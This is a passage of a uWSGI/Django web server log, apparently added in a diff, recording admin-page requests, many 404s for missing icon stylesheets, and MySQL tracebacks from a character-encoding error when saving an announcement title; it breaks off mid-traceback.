+[pid: 11057|app: 0|req: 959/1242] 180.160.72.163 () {38 vars in 819 bytes} [Thu Jan 14 08:50:13 2021] GET /static/css/animate.css => generated 3513 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 960/1243] 61.129.6.145 () {32 vars in 589 bytes} [Thu Jan 14 08:50:23 2021] GET /admin-home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 961/1244] 61.129.6.227 () {32 vars in 512 bytes} [Thu Jan 14 08:50:27 2021] GET /kind-manage => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1)
+[]
+[pid: 11057|app: 0|req: 962/1245] 61.129.6.174 () {32 vars in 587 bytes} [Thu Jan 14 08:52:06 2021] GET /all-3-0-0 => generated 8106 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: -1|req: -1/1246] 61.129.6.174 () {34 vars in 589 bytes} [Thu Jan 14 08:52:26 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1247] 61.129.6.174 () {34 vars in 566 bytes} [Thu Jan 14 08:53:33 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1248] 61.129.6.174 () {34 vars in 587 bytes} [Thu Jan 14 08:53:53 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1249] 61.129.6.174 () {34 vars in 604 bytes} [Thu Jan 14 08:54:42 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1250] 61.129.6.174 () {34 vars in 679 bytes} [Thu Jan 14 08:55:22 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1251] 61.129.6.174 () {34 vars in 595 bytes} [Thu Jan 14 08:55:42 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 11057|app: 0|req: 963/1252] 219.228.146.156 () {38 vars in 865 bytes} [Thu Jan 14 08:58:27 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 964/1253] 219.228.146.156 () {40 vars in 921 bytes} [Thu Jan 14 08:58:31 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 965/1254] 219.228.146.156 () {48 vars in 1018 bytes} [Thu Jan 14 08:58:44 2021] POST /my-admin/ => generated 27 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 966/1255] 219.228.146.156 () {40 vars in 928 bytes} [Thu Jan 14 08:58:47 2021] GET /admin-home/ => generated 6515 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: -1|req: -1/1256] 219.228.146.156 () {40 vars in 928 bytes} [Thu Jan 14 08:58:48 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1257] 219.228.146.156 () {40 vars in 862 bytes} [Thu Jan 14 08:58:48 2021] GET /static/css/style.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1258] 219.228.146.156 () {40 vars in 874 bytes} [Thu Jan 14 08:58:48 2021] GET /static/css/colors/blue.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1259] 219.228.146.156 () {40 vars in 891 bytes} [Thu Jan 14 08:58:48 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1260] 219.228.146.156 () {40 vars in 903 bytes} [Thu Jan 14 08:58:48 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1261] 219.228.146.156 () {40 vars in 909 bytes} [Thu Jan 14 08:58:48 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 967/1262] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 08:58:48 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 968/1263] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 08:58:48 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 969/1264] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 08:58:48 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 970/1265] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 08:58:48 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 971/1266] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 08:58:48 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 972/1267] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 08:58:48 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 973/1268] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 08:58:48 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 974/1269] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 08:58:48 2021] GET /static/css/spinners.css => generated 3516 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 975/1270] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 08:58:48 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: -1|req: -1/1271] 219.228.146.156 () {40 vars in 867 bytes} [Thu Jan 14 08:58:48 2021] GET /static/js/jquery.slimscroll.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1272] 219.228.146.156 () {40 vars in 843 bytes} [Thu Jan 14 08:58:48 2021] GET /static/js/waves.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1273] 219.228.146.156 () {40 vars in 855 bytes} [Thu Jan 14 08:58:48 2021] GET /static/js/sidebarmenu.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1274] 219.228.146.156 () {40 vars in 931 bytes} [Thu Jan 14 08:58:48 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1275] 219.228.146.156 () {40 vars in 853 bytes} [Thu Jan 14 08:58:48 2021] GET /static/js/custom.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1276] 219.228.146.156 () {40 vars in 927 bytes} [Thu Jan 14 08:58:48 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: 0|req: 976/1277] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 08:58:50 2021] GET /announcement/ => generated 7421 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 977/1278] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 08:58:50 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 978/1279] 219.228.146.156 () {38 vars in 897 bytes} [Thu Jan 14 08:58:50 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 979/1280] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 08:58:50 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 980/1281] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 08:58:50 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 981/1282] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 08:58:50 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 982/1283] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 08:58:50 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 983/1284] 219.228.146.156 () {38 vars in 929 bytes} [Thu Jan 14 08:58:50 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 984/1285] 219.228.146.156 () {38 vars in 821 bytes} [Thu Jan 14 08:58:50 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 985/1286] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 08:58:50 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Internal Server Error: /announcement/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\x85\\xAC\\xE7\\xBA\\xA6' for column 'a_title' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 477, in announcement
+ models.Announcement.objects.create(a_title=a_title, a_content=a_content)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\x85\\xAC\\xE7\\xBA\\xA6' for column 'a_title' at row 1")
+[pid: 11057|app: 0|req: 986/1287] 219.228.146.156 () {48 vars in 1029 bytes} [Thu Jan 14 08:59:02 2021] POST /announcement/ => generated 208569 bytes in 126 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 987/1288] 219.228.146.156 () {40 vars in 936 bytes} [Thu Jan 14 08:59:02 2021] GET /announcement/? => generated 7421 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 4861] hr_write(): Broken pipe [plugins/http/http.c line 565]
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 988/1289] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 08:59:03 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 989/1290] 219.228.146.156 () {38 vars in 885 bytes} [Thu Jan 14 08:59:03 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 990/1291] 219.228.146.156 () {38 vars in 897 bytes} [Thu Jan 14 08:59:03 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 991/1292] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 08:59:03 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 992/1293] 219.228.146.156 () {38 vars in 929 bytes} [Thu Jan 14 08:59:03 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 993/1294] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 08:59:03 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 22 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 994/1295] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 08:59:03 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 995/1296] 219.228.146.156 () {38 vars in 821 bytes} [Thu Jan 14 08:59:03 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 996/1297] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 08:59:03 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 997/1298] 219.228.146.156 () {42 vars in 967 bytes} [Thu Jan 14 08:59:10 2021] GET /announcement/? => generated 7421 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 998/1299] 219.228.146.156 () {38 vars in 885 bytes} [Thu Jan 14 08:59:10 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 999/1300] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 08:59:10 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1000/1301] 219.228.146.156 () {38 vars in 897 bytes} [Thu Jan 14 08:59:10 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1001/1302] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 08:59:10 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1002/1303] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 08:59:10 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1003/1304] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 08:59:10 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 24 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1004/1305] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 08:59:10 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1005/1306] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 08:59:10 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1006/1307] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 08:59:10 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1007/1308] 219.228.146.156 () {40 vars in 935 bytes} [Thu Jan 14 08:59:16 2021] GET /kind-manage/ => generated 7366 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1008/1309] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 08:59:17 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1009/1310] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 08:59:17 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1010/1311] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 08:59:17 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1011/1312] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 08:59:17 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1012/1313] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 08:59:17 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1013/1314] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 08:59:17 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1014/1315] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 08:59:17 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1015/1316] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 08:59:17 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1016/1317] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 08:59:17 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Internal Server Error: /kind-manage/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
